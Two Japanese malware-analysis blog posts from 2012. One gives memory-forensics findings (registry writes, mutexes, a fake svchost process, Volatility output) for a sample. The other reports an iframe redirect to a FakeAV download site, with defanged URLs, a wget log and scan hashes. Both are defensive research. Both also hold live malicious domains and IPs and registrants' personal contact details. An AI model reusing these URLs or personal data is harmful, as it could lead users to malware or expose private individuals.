C:\Documents and Settings\owner\Local Settings\Temp\iXrslt4ZtgabZV.exe.tmp
C:\Documents and Settings\owner\Local Settings\Temp\nT4Dsd0TzmBGEn.exe.tmp
C:\Documents and Settings\owner\Local Settings\Temp\rgq0MpAuiIHR5D.exe.tmp
C:\Documents and Settings\owner\Local Settings\Temp\xqgVoz2Qhq6OhZ.exe.tmp



// レジストリー書き込みは↓
HKLM\System\CurrentControlSet\Control\Session Manager 
   PendingFileRenameOperations
        0x5c003f003f005c0043003a005c0044004f00430055004d0045007e003100

//暗号化の動きはメモリに出ました↓
000000027D62 000000027D62  wSOFTWARE\Microsoft\Cryptography\Defaults\Provider
000000028127 000000028127  SOFTWARE\Microsoft\Cryptography\Defaults\Provider\
0000000281DF 0000000281DF  SOFTWARE\Microsoft\Cryptography\Providers\Type 
00000002820F 00000002820F  SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 
00000002834F 00000002834F  SystemLibraryDTC
0000000290D7 0000000290D7  SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types

// 下記のMUTEXが1つずつ作られて↓
ZonesCounterMutex
ZonesLockedCacheCounterMutex
CTF.Asm.MutexDefaultS-1-5-21-842925246-1425521274-308236825-500
CTF.Compart.MutexDefaultS-1-5-21-842925246-1425521274-308236825-500
CTF.LBES.MutexDefaultS-1-5-21-842925246-1425521274-308236825-500
CTF.Layouts.MutexDefaultS-1-5-21-842925246-1425521274-308236825-500
CTF.TMD.MutexDefaultS-1-5-21-842925246-1425521274-308236825-500
CTF.TimListCache.FMPDefaultS-1-5-21-842925246-1425521274-308236825-500MUTEX.
   DefaultS-1-5-21-842925246-1425521274-308236825-500

// そしてマルウェアSVCHOSTサービスが出ました↓
PID: 2740 svchost.exe 
Start:0x7c810856 MEM_IMAGE 
Base: 0x7c910760 MEM_I  


// ソケット動きとネットワークについて
最初はミスかなぁと思いましたが、何回も確認したので、ネットワーク動きはありません。
特別のフックやAPIコールに付いて、DLL経由しかありませんでした。
(さらにDLL一覧を見るとネットワーク動きがあるとおかしくないのに…)
結果、ネットワーク動きがありません。

// SVCHOSTの情報↓

本当にこのマルウェアのせいにニセSVCHOSTが出たのか?←の確認もしました。
HijackThisのスナップショットを使いましたので、感染の前と後の結果をDIFFしました↓
//Hijack diff method
$ diff hijackthis001.txt hijackthis002.txt //001=before infection, 002=after
2c2
< Scan saved at 23:08:36, on 2012/05/12
---
> Scan saved at 23:30:52, on 2012/05/12
39a40
> C:\WINDOWS\System32\svchost.exe <----- malware started this process!
93c94
< End of file - 5999 bytes
---
> End of file - 6032 bytes   


3. Forensicsの調査↓

二つ方法を使いました、1)unix版のvolatility 2)WinDbgのスナップショット
結果↓

// マルウェアプロセスは「<==」のマークとなります↓
 Offset(P)  Name          PID   PPID Tds   Hnds   Time
---------- ------------------ ------ -- ------ -------------------
0x01212020 System           4      0 54    264 1970-01-01 00:00:00
0x03d2f780 smss.exe       632      4  3     21 2012-05-12 13:58:17
  :
0x05f004c0 QCTRAY.EXE     380    184 10    139 2012-05-12 13:59:25
0x0591bba0 QCWLICON.EXE   348    184  1     97 2012-05-12 13:59:26
0x0a9d17c0 rundll32.exe   464    184  1     47 2012-05-12 13:59:27
0x0b01a020 ctfmon.exe     660    184  1     56 2012-05-12 13:59:28
0x007083c8 DLG.exe       1160    184  2     57 2012-05-12 13:59:33
0x06167b30 svchost.exe   2740    756  7    105 2012-05-12 14:23:17 <===

// プロセスの親の確認↓
Name                           Pid PPid Thds HndsTime
--------------------------------------------------------
 0x8133B020:System               4    0  54  264 1970-01-01 00:00:00 0)
. 0xFF898780:smss.exe          632    4   3   21 2012-05-12 13:58:17 1)
.. 0xFF819DA8:winlogon.exe     712  632  19  463 2012-05-12 13:58:22 2)
... 0xFF7FE5B0:services.exe    756  712  17  286 2012-05-12 13:58:25 3)
.... 0xFF397B30:svchost.exe   2740  756   7  105 2012-05-12 14:23:17 4)

↑services.exeが親という事はregistry経由で動かした事が分かりました。

//どのコマンドラインだろう?
svchost.exe pid:   2740
Command line : C:\WINDOWS\System32\svchost.exe -k imgsvc 

// DUMPデータについて
メモリDUMPが大きいのでシェアが出来ません。研究の為に下記のdumpがあります↓
1)その他デバッガのdump と 2)WinDbgのdump のダウンロードが出来ます。
(rarでアーカイブしました、パスワードはocjpです)
4. リファレンス調査↓

■感染されたサーバの情報(手続きのために)

ドメイン登録↓

Registrant:
Blue Field
   ATTN BLUEFI.COM
   care of Network Solutions
   PO Box 459
   Drums, PA.  US  18222
   Domain Name: BLUEFI.COM
   Administrative Contact, Technical Contact:
      Mizuno, Takashi           
      nj4w96ms5e2@networksolutionsprivateregistration.com
      ATTN BLUEFI.COM
      care of Network Solutions
      PO Box 459
      Drums, PA 18222
      US
      570-708-8780
IP/ネットワーク登録情報↓

IP: 210.188.199.218
Network Information:
a. [Network Number]             210.188.199.192/26
b. [Network Name]               HETEML
g. [Organization]               paperboy&co. ltd.
m. [Administrative Contact]     HK13505JP
n. [Technical Contact]          SK11426JP
  a. [JPNICハンドル]              SK11426JP
  b. [氏名]                       小林 翔平
  c. [Last, First]                Kobayashi, Syouhei
  d. [電子メイル]                 kobayashi@paperboy.co.jp
  f. [組織名]                     株式会社paperboy&co.
  g. [Organization]               paperboy&co. ltd.
  a. [JPNICハンドル]              HK13505JP
  b. [氏名]                       河添 寛
  c. [Last, First]                Kawazoe, Hiroshi
  d. [電子メイル]                 h.kawazoe@paperboy.co.jp
  f. [組織名]                     株式会社paperboy&co.
  g. [Organization]               paperboy&co. ltd.
[Assigned Date]                 2006/11/30
[Return Date]
[Last Update]                   2006/11/30 15:53:03(JST)
Less Specific Info.
----------
SAKURA Internet Inc.                  [Allocation]      210.188.196.0/22
SRS SAKURA Internet Inc. SUBA-247-105 [Sub Allocation]  210.188.196.0/22
↑これを見たらVPSサーバだと思われます。
同じサーバ/IPアドレスに220ドメインがありますので、
もし感染原因はVPSの標準設定脆弱性ならば感染が増える可能性が出ますのでご注意を下さい↓
---
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
Posted by unixfreaxjp at 5:46 午前 1 comments

金曜日, 5月 11, 2012

#OCJP-047: SAKURA/IDCの「battery-ya.info / 112.78.112.201」ウェブサーバのFakeAV-HTML-Infectorの感染事件 【対応最中】


今回は#OCJP-043と似ている事件です。IFRAME経由ででアクセスユーザがFakeAVダウンロードページへ飛ばされます。
■下記のドメイン/IP↓

battery-ya.info / 112.78.112.201
■下記のURL↓

hxxp://battery-ya.info/toiawase
■ダウンロード証拠↓

--23:11:03--  hxxp://battery-ya.info/toiawase
           => `toiawase'
Resolving battery-ya.info... 112.78.112.201
Connecting to battery-ya.info|112.78.112.201|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://battery-ya.info/toiawase/ [following]
--23:11:03--  http://battery-ya.info/toiawase/
           => `index.html'
Connecting to battery-ya.info|112.78.112.201|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25,631 (25K) [text/html]
100%[====================================>] 25,631        --.--K/s
23:11:03 (280.41 KB/s) - `index.html' saved [25631/25631]
■マルウェア説明↓

ダウンロードしたファイルにマルウェアSCRIPTが書いてあります↓


分析したらマルウェアのIFRAMEのREDIRECTコードが出て来ました↓


そのURLは前回OCJP-043にも調査しましたようにFakeAVとのマルウェアダウンロードサイトです。

※本件のURLをネットで検索したら結果が沢山出てきます
■オンラインスキャン↓

ダウンロードしたindex.htmlをスキャンしたら↓
File name:       index.html
File size:       25.0 KB ( 25631 bytes )
MD5:             c30403c9228af9e38a53efe0e1231944
File type:       HTML
Detection ratio: 19 / 42
Analysis date:   2012-05-10 14:26:46 UTC
Result:          [CLICK]
■感染された環境と情報↓

ドメイン情報:

Domain Name:BATTERY-YA.INFO
Created On:30-Dec-2011 01:21:14 UTC
Last Updated On:28-Feb-2012 20:41:59 UTC
Expiration Date:30-Dec-2012 01:21:14 UTC
Sponsoring Registrar:GMO Internet, Inc. d/b/a Onamae.com (R110-LRMS)
Status:OK
Registrant ID:1348C8E682D
Registrant Name:keita nakayama
Registrant Organization:keita nakayama
Registrant City:Ogaki-shi
Registrant State/Province:Gifu
Registrant Postal Code:503-0937
Registrant Country:JP
Registrant Phone:+81.09074196396
Registrant Email:tiko1374@yahoo.co.jp
ドメインのインターネットルーティング・グラフ↓


IP情報↓

inetnum:        112.78.112.0 - 112.78.127.255
netname:        SAKURA-OSAKA
descr:          SAKURA Internet Inc.
descr:          1-8-14, Minami Honmachi, Chuo-ku, Osaka 541-0054, Japan
country:        JP
admin-c:        JNIC1-AP
tech-c:         JNIC1-AP
status:         ALLOCATED PORTABLE
remarks:        Email address for spam or abuse complaints abuse@sakura.ad.jp
changed:        hm-changed@apnic.net 20090108
mnt-by:         MAINT-JPNIC
mnt-lower:      MAINT-JPNIC
source:         APNIC

PS:同じIPで80個ドメインが提供しています、感染が増える可能性があります。
---
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
Posted by unixfreaxjp at 12:01 午前 0 comments
登録: 投稿 (Atom)